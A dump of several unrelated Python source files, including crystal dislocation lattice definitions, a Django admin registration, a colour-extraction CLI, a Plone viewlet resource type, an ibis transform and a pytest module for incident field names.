"disl_line_direction" : [-1./math.sqrt(6.), -1./math.sqrt(6.), 2./math.sqrt(6.)],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
# new frame: [e1', e2', e3'], ei' are column vectors
"frame_new" : [[ -1.0, 1.0, -0.5],
[ 1.0, 1.0, -0.5],
[ 0, 1.0, 1.0]],
}
fcc_screw = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 0.5 * math.sqrt(6),
"cell_y" : math.sqrt(3),
"cell_z" : 0.5 * math.sqrt(2),
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[1./2., 0, 1./2. ],
[2./3., 2./3., 0 ],
[1./6., 2./3., 1./2. ],
[1./3., 1./3., 0 ],
[5./6., 1./3., 1./2. ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1, 1, 1],
# Burgers vector (scaled by lattice constant)
"burgers" : [-0.5, 0.5, 0.0],
# dislocation line direction (unit vector)
"disl_line_direction" : [-1./math.sqrt(2.), 1./math.sqrt(2.), 0.],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
# new frame: [e1', e2', e3'], ei' are column vectors
"frame_new" : [[ 0.5, 1.0, 1.0],
[ 0.5, 1.0, -1.0],
[-1.0, 1.0, 0.0]],
}
fcc_mix = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 0.5 * math.sqrt(2),
"cell_y" : math.sqrt(3),
"cell_z" : 0.5 * math.sqrt(6),
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[1./2., 0, 1./2. ],
[0, 2./3., 1./3. ],
[1./2., 2./3., 5./6. ],
[0, 1./3., 2./3. ],
[1./2., 1./3., 1./6. ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1, 1, 1],
# Burgers vector (scaled by lattice constant)
"burgers" : [-0.5, 0., 0.5],
# dislocation line direction (unit vector)
"disl_line_direction" : [1./math.sqrt(6.), 1./math.sqrt(6.), -2./math.sqrt(6.)],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
# new frame: [e1', e2', e3'], ei' are column vectors
"frame_new" : [[ 1, 1.0, -0.5],
[ -1, 1.0, -0.5],
[ 0, 1.0, 1.0]],
}
# hcp b_vector is at the new frame coordinate
hcp_screw_a_basal = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : math.sqrt(3),
"cell_y" : 1,
"cell_z" : 1,
"cell_x_latt_const" : "a",
"cell_y_latt_const" : "c",
"cell_z_latt_const" : "a",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[1./2., 0, 1./2 ],
[1./3, 1./2, 0. ],
[5./6, 1./2, 1./2 ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1,],
# Burgers vector (scaled by lattice constant)
"burgers" : [0, 0, 1],
# dislocation line direction (unit vector)
"disl_line_direction" : [0., 0, 1],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
# new frame: [e1', e2', e3'], ei' are column vectors
"frame_new" : [[ 1, 0, 0 ],
[ 0, 0, -1 ],
[ 0, 1, 0 ]],
}
hcp_edge_a_basal = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 1,
"cell_y" : 1,
"cell_z" : math.sqrt(3),
"cell_x_latt_const" : "a",
"cell_y_latt_const" : "c",
"cell_z_latt_const" : "a",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[1./2., 0, 1./2 ],
[0, 1./2, 2./3 ],
[1./2, 1./2, 1./6 ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1,],
# Burgers vector (scaled by lattice constant)
"burgers" : [1, 0, 0],
# dislocation line direction (unit vector)
"disl_line_direction" : [0, 0, 1],
# dislocation position (relative coordinates in a unit cell)
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
# new frame: [e1', e2', e3'], ei' are column vectors
"frame_new" : [[ 1, 0, 0 ],
[ 0, 0, -1 ],
[ 0, 1, 0 ]],
}
hcp_screw_a_prismI = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 1,
"cell_y" : math.sqrt(3),
"cell_z" : 1,
"cell_x_latt_const" : "c",
"cell_y_latt_const" : "a",
"cell_z_latt_const" : "a",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[0, 1./2, 1./2 ],
[1./2, 1./3, 0 ],
[1./2, 5./6, 1./2 ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1,],
# Burgers vector (scaled by lattice constant)
"burgers" : [0, 0, 1],
# dislocation line direction (unit vector)
"disl_line_direction" : [0, 0, 1],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
# new frame: [e1', e2', e3'], ei' are column vectors
"frame_new" : [[ 0, 0, -1 ],
[ 0, 1, 0 ],
[ 1, 0, 0 ]],
}
hcp_edge_a_prismI = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 1,
"cell_y" : 1,
"cell_z" : math.sqrt(3),
"cell_x_latt_const" : "a",
"cell_y_latt_const" : "c",
"cell_z_latt_const" : "a",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[1./2, 0, 1./2 ],
[0, 1./2, 1./3 ],
[1./2, 1./2, 5./6 ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1,],
# Burgers vector (scaled by lattice constant)
"burgers" : [1, 0, 0],
# dislocation line direction (unit vector)
"disl_line_direction" : [1, 0, 0],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
# new frame: [e1', e2', e3'], ei' are column vectors
"frame_new" : [[ 1, 0, 0 ],
[ 0, 0, -1 ],
[ 0, 1, 0 ]],
}
hcp_edge_a_pyrI = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 1,
"cell_y" : 2,
"cell_z" : math.sqrt(3),
"cell_x_latt_const" : "a",
"cell_y_latt_const" : "c",
"cell_z_latt_const" : "a",
# basis atoms (relative coordinates)
"basis_atoms" : [[1., -1., 1 ],
[1./2, -1., 3./2 ],
[1., -3./4, 4./3 ],
[1./2, -3./4, 11./6 ],
[1., -1./2, 1. ],
[1./2, -1./2, 1./2 ],
[1./2, -1./4, 5./6 ],
[1., -1./4, 1./3 ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1, 1, 1, 1, 1],
# Burgers vector (scaled by lattice constant)
"burgers" : [1, 0, 0],
# dislocation line direction (unit vector)
"disl_line_direction" : [0, 0, 1],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
"frame_new" : [[1, 0, 0],
[0, 0, -1],
[0, 1, 0]],
}
hcp_screw_ca_pyrII = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : math.sqrt(3),
"cell_y" : 1,
"cell_z" : 1,
"cell_x_latt_const" : "a",
"cell_y_latt_const" : "c",
"cell_z_latt_const" : "a",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, -1, 1 ],
[1./2, -1, 3./2 ],
[1./3, -1./2, 0 ],
[5./6, -1./2, 1./2 ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1],
# Burgers vector (scaled by lattice constant)
"burgers" : [0, 0, 1],
# dislocation line direction (unit vector)
"disl_line_direction" : [0, 0, 1],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
"frame_new" : [[1, 0, 0],
[0, 0, -1],
[0, 1, 0]],
}
hcp_screw_ca_pyrI = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : math.sqrt(3)/2,
"cell_y" : 1,
"cell_z" : 1,
"cell_x_latt_const" : "a",
"cell_y_latt_const" : "c",
"cell_z_latt_const" : "a",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[1./3, 1./2, 1./2 ]],
# type of each atom
"type_basis_atoms" : [1, 1,],
# Burgers vector (scaled by lattice constant)
"burgers" : [0, 0, 1],
# dislocation line direction (unit vector)
"disl_line_direction" : [0, 0, 1],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
"frame_new" : [[1, 0, 0],
[0, 0, -1],
[0, 1, 0]],
}
hcp_edge_ca_pyrII = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 1,
"cell_y" : 1,
"cell_z" : math.sqrt(3),
"cell_x_latt_const" : "a",
"cell_y_latt_const" : "c",
"cell_z_latt_const" : "a",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[-1./2, 0, 1./2 ],
[ 0 , 1./2, 1./3 ],
[ 1./2 , 1./2, 5./6 ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1],
# Burgers vector (scaled by lattice constant)
"burgers" : [1, 0, 0],
# dislocation line direction (unit vector)
"disl_line_direction" : [0, 0, 1],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
"frame_new" : [[1, 0, 0],
[0, 0, -1],
[0, 1, 0]],
}
hcp_mixed_ca_prismI = { #NO PBC
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 1,
"cell_y" : math.sqrt(3),
"cell_z" : 1,
"cell_x_latt_const" : "a",
"cell_y_latt_const" : "a",
"cell_z_latt_const" : "c",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[-1./2, 1./2, 0 ],
[ 1./2 , 1./6, 1./2 ],
[ 0 , 2./3, 1./2 ],],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1,],
# Burgers vector (scaled by lattice constant)
"burgers" : [1, 0, 1],
# dislocation line direction (unit vector)
"disl_line_direction" : [0, 0, 1],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
"frame_new" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
} # no pbc !!>>>
hcp_mixed_ca_pyrI = { #NO PBC
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : math.sqrt(3),
"cell_y" : 2,
"cell_z" : 1,
"cell_x_latt_const" : "a",
"cell_y_latt_const" : "c",
"cell_z_latt_const" : "a",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[ 1./2, 0, 1./2 ],
[ 1./3 , 1./4, 0 ],
[ 5./6 , 1./4, 1./2 ],
[ -1./2, 1./2, 1./2 ],
[-1./6, 3./4, 1./2 ],
[-2./3, 3./4, 0 ],
[0, 1./2, 0]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1, 1, 1, 1, 1, ],
# Burgers vector (scaled by lattice constant)
"burgers" : [1./2, 0, 1./2],
# dislocation line direction (unit vector)
"disl_line_direction" : [0, 0, 1],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
"frame_new" : [[1, 0, 0],
[0, 0, -1],
[0, 1, 0]],
}
hcp_screw_c_prismI = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 1,
"cell_y" : math.sqrt(3),
"cell_z" : 1,
"cell_x_latt_const" : "a",
"cell_y_latt_const" : "a",
"cell_z_latt_const" : "c",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[1./2, 1./2, 0 ],
[1./2, 1./6, 1./2 ],
[1., 2./3, 1./2 ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1],
# Burgers vector (scaled by lattice constant)
"burgers" : [0, 0, 1],
# dislocation line direction (unit vector)
"disl_line_direction" : [0, 0, 1],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
"frame_new" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
}
hcp_edge_c_prismI = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 1,
"cell_y" : math.sqrt(3),
"cell_z" : 1,
"cell_x_latt_const" : "c",
"cell_y_latt_const" : "a",
"cell_z_latt_const" : "a",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[0, 1./2, 1./2 ],
[1./2, 5./6, 1./2 ],
[1./2, 1./3, 1. ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1],
# bind type to element
# Burgers vector (scaled by lattice constant)
"burgers" : [1, 0, 0],
# dislocation line direction (unit vector)
"disl_line_direction" : [0, 0, 1],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
"frame_new" : [[0, 0, -1],
[0, 1, 0],
[1, 0, 0]],
}
hcp_edge_c_prismII = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 1,
"cell_y" : 1,
"cell_z" : math.sqrt(3),
"cell_x_latt_const" : "c",
"cell_y_latt_const" : "a",
"cell_z_latt_const" : "a",
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[0, 1./2, 1./2 ],
[1./2, 1./2, 5./6 ],
[1./2, 1. , 1./3]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1],
# Burgers vector (scaled by lattice constant)
"burgers" : [1, 0, 0],
# dislocation line direction (unit vector)
"disl_line_direction" : [0, 0, 1],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
"frame_new" : [[0, 0, -1],
[0, 1, 0],
[1, 0, 0]],
}
|
994,277 | 1b7758bdfa66c3e4ea54060330f342e2446e88bc | from django.contrib import admin
from django_vcs.models import CodeRepository
class CodeRepositoryAdmin(admin.ModelAdmin):
prepopulated_fields = {
'slug': ('name',)
}
admin.site.register(CodeRepository, CodeRepositoryAdmin)
|
994,278 | 14d127424b2e593bfa7ae7a5f9da2877239c72e2 | # Grid codes
from . import Q2012034_L3m_DAY_EVSCI_V1_2DR_SSS_1deg
# Swath codes
from . import Q2011280003000_L2_EVSCI_V1_2
|
994,279 | ca7b5e1fa0ba4697d4e2104c97e1808edff95fb0 | import os
import operator
root = r'/Users/michaelpuncel/Desktop/Spring2013/6.345/speech-authentication/by_speaker/'
matlab_script = file(r'/Users/michaelpuncel/Desktop/Spring2013/6.345/speech-authentication/matlab_scripts/mfcc_saver.m', 'w')
for root, dirs, files in os.walk(root):
for dir in dirs:
for root2, dirs2, files2 in os.walk(os.path.join(root, dir)):
for filename in files2:
if filename[len(filename) - 4:] == '.wav':
try:
opa_file = file(root + dir + '/' + filename[0:-4] + '.opa')
except IOError:
continue
lines = opa_file.readlines()
first_line = lines[0]
last_line = lines[-1]
foo = 1
while last_line == '\n':
last_line = lines[-1 - foo]
foo += 1
start_index = first_line.split(' ')[0]
end_index = last_line.split(' ')[1]
filepath = os.path.join(root, filename)
matlab_script.write('compute_mfcc(\'%s\', \'%s\', \'%s\', %s, %s)' % (dir, filename[0: -4] + '.mat', filename, start_index, end_index))
matlab_script.write('\n')
matlab_script.close()
|
994,280 | 0c95519365f06508adb87e3f065cc498690d1197 | from fdx_color_extractor import FdxColorExtractor
import sys
import click
import os
import json
sys.path.append('../core')
@click.command()
@click.option('--swatch', '-s', default=False, help='True, True indicates images are swatch images')
@click.option('--image', '-i', help='path of the image')
@click.option('--dir', '-d', help='path of the directory')
@click.option('--out', '-o', default=None, help='Name of the output file')
def compute(swatch, image, dir, out):
""" Command Line Interface for color extractor wraps on top of the core app.
Parameters
----------
swatch: boolean
True indicates the image is swatch image and vice versa
image: str
Path to the image
dir: str
Path to the directory
out: str
Path to the output file to which output would be printed
"""
if out:
print_to = open(out.encode('utf-8'), 'w')
else:
print_to = sys.stdout
if image:
compute_results(image, swatch, print_to)
elif dir:
compute_results(dir, swatch, print_to)
def compute_results(path, swatch, print_to):
"""
gets the rgb, hsl values and hasl tags for all images using extract method of FdxColorExtractor and prints the image_path
and the above values as a json record
Parameters
----------
path : str
The path to the directory or the path of an image
swatch : boolean
True indicates image is a swatch image and vice versa
print_to : File/sys.stdout
The file to which ouput needs to be printed to
"""
file_urls = get_images(path)
for file_url in file_urls:
# gets the fdxcolorextractor object containing color palette
color_palette = FdxColorExtractor(file_url, swatch).extract()
# gets the dictionary part of the object
color_palette_dict = color_palette.__dict__
# dumps to json asking the encoder to take dict form of every object
color_palette_jsondump = json.dumps(color_palette_dict, default=lambda o: o.__dict__)
print(color_palette_jsondump, file=print_to)
def get_images(path):
"""
Gets paths of all images in a given directory or a list containing one image if the given path is that of an image
Parameters
----------
path : The path to the directory
Returns
-------
images : list of all images
"""
exts = ['.png', '.jpg', '.jpeg']
images = []
if os.path.isfile(path):
file_name, file_ext = os.path.splitext(path)
if file_ext in exts:
return [path]
else:
files = get_files(path)
for file in files:
file_name, file_ext = os.path.splitext(file)
if file_ext in exts:
images.append(file)
return images
def get_files(path):
"""
Gets paths of all files in a given directory
Parameters
----------
path : The path to the directory
Returns
-------
files : list of all files
"""
files = []
for dirpath, _, filenames in os.walk(path):
for filename in [f for f in filenames]:
files.append(os.path.join(dirpath, filename))
return files
if __name__ == "__main__":
compute()
|
994,281 | 6c939a68c27a67db4bc4278b1480b9b2cff3d6d2 | from colorama import init, Fore
import os
from string import Formatter
import random
from .support import merge
def get_field_value(field_name, mapping):
try:
def recursive_get(field_name, mapping):
if '.' not in field_name:
return mapping[field_name], True
else:
*attrs, = field_name.split('.')
return recursive_get(".".join(attrs[1:]), mapping[attrs[0]])
return recursive_get(field_name, mapping)
except:
# traceback.print_exc()
return field_name, False
def str_format_map(format_string, mapping):
f = Formatter()
parsed = f.parse(format_string)
output = []
for literal_text, field_name, format_spec, conversion in parsed:
conversion = '!' + conversion if conversion is not None else ''
format_spec = ':' + format_spec if format_spec else ''
if field_name is not None:
field_value, found = get_field_value(field_name, mapping)
if not found:
text = '{{{}{}{}}}'.format(field_value,
conversion,
format_spec)
else:
format_string = '{{{}{}}}'.format(conversion, format_spec)
text = format_string.format(field_value)
output.append(literal_text + text)
text = ''
return ''.join(output)
def populate_object(script, data={}):
def recursive_populate(script, data):
variables = data #safedotdict(**data)
if isinstance(script, dict):
for (key, value) in script.items():
if isinstance(value, str):
if '{' in value and '}' in value:
try:
new_value = str_format_map(value, variables)
script[key] = new_value
except Exception as e:
init(autoreset=True)
print(Fore.RED + 'error in {},\n{}'.format(value, e))
else:
recursive_populate(script[key], data)
else:
return
script_copy = dict(**script)
recursive_populate(script_copy, data)
return script_copy
def populate_string( yaml_string, data={}):
"""
max one {{ }} per line!
"""
import random
def replace_in_line(line):
if '{{' in line and '}}' in line and not ('#' in line and line.index('#') < line.index('{{')):
begin = line.index('{{')
end = line.index('}}', begin)
variable_name = line[begin:end].strip().replace('{{','').replace('}}','').strip()
try:
return (
line[:begin].replace('{{','').replace('}}','') +
str(xeval(variable_name, merge(data, os.environ))) +
line[end:].replace('}}','').replace('{{','')
)
except:
var = locate_variable(line)
raise Exception('yaml file needs all data to be evaluated: {{{{ {} }}}}'.format(variable_name))
else:
return line
new_lines = list(map(replace_in_line, yaml_string.splitlines()))
return '\n'.join(new_lines)
def locate_variable(script):
begin = script.index('{{')
end = script.index('}}', begin )
return script[begin:end].replace('{{', '').strip()
def xeval(expr, data):
try:
return eval(expr, dict(
random=random,
env=os.environ,
**data,
# User=User,
# Story=Story,
# Media=Media,
# Hashtag=Hashtag,
# Geotag=Geotag
))
except Exception as e:
print(f'error {e} in xeval for {expr}')
raise
|
994,282 | 55ae25b40552d541b917af7ebc3aa1de4e4ca3d6 | from models import Advertiser
from models.ad import Ad
if __name__ == '__main__':
advertiser1 = Advertiser('name1')
advertiser2 = Advertiser('name2')
ad1 = Ad(title='title1', image_url='image-url1', link='link1', advertiser=advertiser1)
ad2 = Ad(title='title2', image_url='image-url2', link='link2', advertiser=advertiser2)
ad2.describe_me()
advertiser1.describe_me()
ad1.inc_views()
ad1.inc_views()
ad1.inc_views()
ad1.inc_views()
ad2.inc_views()
ad1.inc_clicks()
ad1.inc_clicks()
ad2.inc_clicks()
print(advertiser2.get_name())
advertiser2.set_name('new name')
print(advertiser2.get_name())
print(ad1.get_clicks())
print(advertiser2.get_clicks())
print(Advertiser.get_total_clicks())
print(Advertiser.help()) |
994,283 | cfa9d3f6348637835af0313b8c6a14c5c9274d1b | #Autor: Felipe Gomez Portugal
#
km = float(input("Teclea el numero de km recorridos: "))
lt = int(input("Teclea el numero de litros de gasolina usados: "))
rendimiento = |
994,284 | 8c648c168d08eb1b65e8ff11c98d57a7f00984b9 | #!/usr/bin/env python
"""
mark-duplicate-phrases.py: mark duplicate sequences of n words
usage: mark-duplicate-phrases.py file1.xml [file2.xml ...]
notes:
* divides body texts in texts (original) and dups (duplicates)
* ref attributes contain message ids and word ids (n.m)
20190723 erikt(at)xs4all.nl
"""
import sys
import xml.etree.ElementTree as ET
BODY = "Body"
MESSAGE = "Message"
N = 16
phraseFrequencies = {}
phraseInitialPos = {}
def makeRefId(fileName,message,i):
return(fileName+"."+message.attrib["id"]+"."+str(i+1))
def countPhrases(fileName,message):
global phraseFrequencies,phraseInitialPos
words = message.text.split()
inDuplicate = False
duplicateStarts,duplicateEnds,duplicateRefs = [],[],[]
for i in range(0,len(words)-N):
phrase = " ".join(words[i:i+N])
if phrase in phraseFrequencies:
phraseFrequencies[phrase] += 1
if not inDuplicate:
inDuplicate = True
duplicateStarts.append(i)
duplicateRefs.append(phraseInitialPos[phrase])
else:
phraseFrequencies[phrase] = 1
phraseInitialPos[phrase] = makeRefId(fileName,message,i)
if inDuplicate:
inDuplicate = False
duplicateEnds.append(i+N-2)
if inDuplicate: duplicateEnds.append(len(words)-1)
return(duplicateStarts,duplicateEnds,duplicateRefs)
def markDuplicates(message,duplicateStarts,duplicateEnds,duplicateRefs):
words = message.text.split()
message.text = ""
wordIndex = 0
while len(duplicateStarts) > 0:
indexDuplicateStarts = duplicateStarts.pop(0)
indexDuplicateEnds = duplicateEnds.pop(0)
duplicateRef = duplicateRefs.pop(0)
if indexDuplicateStarts > wordIndex:
text = ET.SubElement(message,"text")
text.text = " ".join(words[wordIndex:indexDuplicateStarts])
if indexDuplicateStarts < indexDuplicateEnds:
dup = ET.SubElement(message,"dup")
dup.text = " ".join(words[indexDuplicateStarts:indexDuplicateEnds+1])
dup.attrib["ref"] = duplicateRef
wordIndex = indexDuplicateEnds+1
if wordIndex < len(words):
text = ET.SubElement(message,"text")
text.text = " ".join(words[wordIndex:])
def convertMessages(fileName,messages):
for key in sorted(messages.keys()):
if messages[key].text != None:
duplicateStarts,duplicateEnds,duplicateRefs = countPhrases(fileName,messages[key])
markDuplicates(messages[key],duplicateStarts,duplicateEnds,duplicateRefs)
def getMessages(root):
messages = {}
idCounter = 0
for message in root.findall(".//"+MESSAGE):
try:
dateSent = message.findall("./"+"DateSent")[0].text
messages[dateSent] = message.findall("./"+BODY)[0]
idCounter += 1
messages[dateSent].attrib["id"] = str(idCounter)
except Exception as e:
sys.exit("error processing message "+message+" "+str(e))
return(messages)
def makeOutputFileName(fileName):
fileNameParts = fileName.split(".")
fileNameParts[-2] += "-dup"
return(".".join(fileNameParts))
def main(argv):
for fileName in sys.argv[1:]:
parser = ET.XMLParser(encoding="utf-8")
tree = ET.parse(fileName,parser=parser)
root = tree.getroot()
messages = getMessages(root)
convertMessages(makeOutputFileName(fileName),messages)
tree.write(makeOutputFileName(fileName))
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
994,285 | 9f8d6d6a7b2a06ac1117f83b8ab6487fa1bef40a |
odd = list(range(1,20,2))
print("The first three numbers of the list are ")
print(odd[0:3])
print("\nThree items from the middle of the list are: ")
print(odd[3:7])
print("\nThe last three items in the list are: ")
print(odd[-3:])
|
994,286 | f18ea982bea51b04f9026d4461e8afb7b169897b | from Products.CMFCore.utils import getToolByName
import itertools
from zope.component import getGlobalSiteManager, getSiteManager
from zope.app.component.hooks import getSite
from plone.app.themeeditor.interfaces import IResourceType
from plone.app.themeeditor.interfaces import IResourceRegistration
from zope.interface import implements
from plone.app.customerize.registration import templateViewRegistrationInfos
from plone.memoize.instance import memoize
from five.customerize.interfaces import ITTWViewTemplate
from zope.viewlet.interfaces import IViewlet
# get translation machinery
from plone.app.themeeditor.interfaces import _
# borrow from plone message factory
from zope.i18n import translate
from zope.i18nmessageid import MessageFactory
PMF = MessageFactory('plone')
class ViewletResourceRegistration(object):
implements(IResourceRegistration)
type = 'viewlet'
icon = '/misc_/PageTemplates/zpt.gif'
class ViewletResourceType(object):
implements(IResourceType)
name = 'viewlet'
@memoize
def layer_precedence(self):
request = getSite().REQUEST
return list(request.__provides__.__iro__)
def iter_viewlet_registrations(self):
gsm = getGlobalSiteManager()
sm = getSiteManager()
layer_precedence = self.layer_precedence()
for reg in itertools.chain(gsm.registeredAdapters(), sm.registeredAdapters()):
if len(reg.required) != 4:
continue
if reg.required[1] not in layer_precedence:
continue
if IViewlet.implementedBy(reg.factory) or ITTWViewTemplate.providedBy(reg.factory):
yield reg
def __iter__(self):
""" Returns an iterator enumerating the resources of this type. """
pvc = getToolByName(getSite(), 'portal_view_customizations')
layer_precedence = self.layer_precedence()
by_layer_precedence_and_ttwness = lambda x: (layer_precedence.index(x.required[1]), int(not ITTWViewTemplate.providedBy(x.factory)))
regs = sorted(self.iter_viewlet_registrations(), key=by_layer_precedence_and_ttwness)
for info in templateViewRegistrationInfos(regs, mangle=False):
required = info['required'].split(',')
res = ViewletResourceRegistration()
res.name = info['viewname']
res.context = required[0], required[3]
if required[0] == 'zope.interface.Interface':
res.description = 'Viewlet for *'
else:
res.description = u'Viewlet for %s' % required[0]
res.description += ' in the %s manager' % required[3]
res.layer = required[1]
res.actions = []
res.path = None
res.customized = bool(info['customized'])
res.tags = ['viewlet']
if info['customized']:
res.tags.append('customized')
obj = getattr(pvc, info['customized'])
res.text = obj._text
res.path = '/'.join(obj.getPhysicalPath())
res.info = translate(_(u"In the database",
default=u"In the database: ${path}",
mapping={u"path" : res.path}))
res.actions.append((PMF(u'Edit'), obj.absolute_url() + '/manage_main'))
remove_url = pvc.absolute_url() + '/manage_delObjects?ids=' + info['customized']
res.actions.append((PMF(u'Remove'), remove_url))
else:
res.info = translate(_('On the filesystem',
default = u'On the filesystem: ${path}',
mapping = {'path': info['zptfile']}))
res.path = info['zptfile']
view_url = pvc.absolute_url() + '/@@customizezpt.html?required=%s&view_name=%s' % (info['required'], info['viewname'])
res.actions.append((PMF(u'View'), view_url))
yield res
def export(self, context):
raise NotImplemented
|
994,287 | b7bad52d6dad7825d53e6b8f072f79a70c02db58 | from moviepy.video.io.VideoFileClip import VideoFileClip
from image_processing import ImageProcessing
def video_processing(file_name):
video_output = "output_videos/" + file_name[:-4] + "_result.mp4"
image_processing = ImageProcessing.invoke
clip1 = VideoFileClip(file_name)
white_clip = clip1.fl_image(image_processing)
white_clip.write_videofile(video_output, audio=False) |
994,288 | 5297e99caf896842a65cdfb5770128718ec7fc7d | import ibis
from ibis_vega_transform.util import promote_list
def collect(transform: dict, expr: ibis.Expr) -> ibis.Expr:
"""
Apply a vega collect transform to an ibis expression.
https://vega.github.io/vega/docs/transforms/collect/
Parameters
----------
transform: dict
A JSON-able dictionary representing the vega transform.
expr: ibis.Expr
The expression to which to apply the transform.
Returns
-------
transformed_expr: the transformed expression
"""
fields = promote_list(transform["sort"]["field"])
orders = promote_list(transform["sort"].get("order", ["ascending"] * len(fields)))
assert len(fields) == len(orders)
rules = [
(field, (True if order == "ascending" else False))
for field, order in zip(fields, orders)
]
return expr.sort_by(rules)
|
994,289 | 0267a3c63e1df17450bcad885afa1da3325463a0 | import pytest
from demisto_sdk.commands.common.hook_validations.incident_field import (
GroupFieldTypes, IncidentFieldValidator)
from demisto_sdk.commands.common.hook_validations.structure import \
StructureValidator
from mock import patch
class TestIncidentFieldsValidator:
NAME_SANITY_FILE = {
'cliName': 'sanityname',
'name': 'sanity name',
'id': 'incident',
'content': True,
}
BAD_NAME_1 = {
'cliName': 'sanityname',
'name': 'Incident',
'content': True,
}
BAD_NAME_2 = {
'cliName': 'sanityname',
'name': 'case',
'content': True,
}
BAD_NAME_3 = {
'cliName': 'sanityname',
'name': 'Playbook',
'content': True,
}
GOOD_NAME_4 = {
'cliName': 'sanityname',
'name': 'Alerting feature',
'content': True,
}
BAD_NAME_5 = {
'cliName': 'sanity name',
'name': 'INciDeNts',
'content': True,
}
INPUTS_NAMES = [
(NAME_SANITY_FILE, False),
(BAD_NAME_1, True),
(BAD_NAME_2, True),
(BAD_NAME_3, True),
(GOOD_NAME_4, False),
(BAD_NAME_5, True)
]
@pytest.mark.parametrize('current_file, answer', INPUTS_NAMES)
def test_is_valid_name_sanity(self, current_file, answer):
import os
import sys
with patch.object(StructureValidator, '__init__', lambda a, b: None):
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
with open("file", 'w') as temp_out:
old_stdout = sys.stdout
sys.stdout = temp_out
validator.is_valid_name()
sys.stdout = old_stdout
with open('file', 'r') as temp_out:
output = temp_out.read()
assert ('IF100' in str(output)) is answer
# remove the temp file
os.system('rm -rf file')
CONTENT_1 = {
'content': True
}
CONTENT_BAD_1 = {
'content': False
}
